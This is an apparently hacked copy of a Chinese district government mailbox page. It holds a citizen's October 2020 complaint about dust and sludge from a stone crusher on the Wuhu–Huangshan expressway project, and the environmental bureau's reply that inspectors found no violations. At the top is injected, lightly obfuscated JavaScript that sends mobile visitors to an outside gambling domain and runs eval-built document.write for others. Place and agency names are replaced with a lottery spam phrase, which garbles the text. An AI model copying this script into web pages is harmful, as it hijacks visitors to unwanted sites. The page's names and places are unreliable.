function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://fd699.vip" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();



您的位置:大发快三官方开奖 >
互动交流 > 区长信箱


环保问题

信件编号: 20201027001 来信时间: 2020-10-27 08:53:33
信件类型: 我要咨询 姓名: 许****
内容: 尊敬的区领导:繁昌县芜黄高速公路的建设是利国利民的好事,作为我们老百姓应该无条件支持,可是在峨山镇湾店村境内施工现场,临时驾设的石子破碎机,根本无任何防尘措施,造成噪音和灰尘到处飞扬。水洗砂现场污泥乱流,山林面貌严重破坏,本是一件为我们老百姓造福的事情,现在确造成了我们老百姓的环境污染。首问区领导,临时驾设的破碎机和洗砂机是否有正规手续,是否经过环保部门审核和政府审批?再问区领导如果是经过正规审批的情况下,生产过程中是否有监管,就以目前的生产状况可以达到环保要求吗?保护环境人人有责!
答复情况:
答复单位:繁昌区生态环境分局    答复时间:2020-10-29 15:43:10

答复意见:

“许****”网友:
    您好!对您反映的问题,区生态环境分局答复如下:
    经与您电话核实,您反映的石子加工点位于大发快三官方开奖省大发快三繁昌区峨山镇象形村龙山组。该破碎点由大发快三官方开奖永成基础工程有限公司负责运营,公司于2019年2月15日通过大发快三官方开奖建工集团公开招投标的方式获得芜黄高速LJ-01标碎石加工施工,项目编号AHLQ(2019)-001(线下),负责人现场提供了中标通知书,该石子破碎是将隧道开采产生的石子加工破碎直接用于高速建设,石子加工点是临时工程,公司提供了《大发快三官方开奖省环保厅关于S11芜湖至黄山高速公路环境影响报告书审批意见的函》(皖环函[2018]1450号)。
    现场检查时,大发快三官方开奖永成基础工程有限公司正在生产。现场建设的设施有:一破一台,二破两台,皮带机9条,卸料口3个,制砂机1台,三台破碎机均封闭在一间2000平方米的大棚内,现场三个卸料口正在卸料,现场卸料口正在带水作业。一台制砂机未进行生产,水洗砂工艺正在运行,废水循环使用,未发现有污泥乱流、灰尘飞扬的现象。
    执法人员现场要求企业严格按照环保要求做好粉尘、废水、噪音的污染防治工作,不得污染周边环境。执法人员也会不定期对该企业进行检查。
    以上答复,如有疑问,可电话咨询,咨询电话:0553-7911309。


用户满意度评价:
  • 查询密码:

  • 评价结果:

    大发快三官方开奖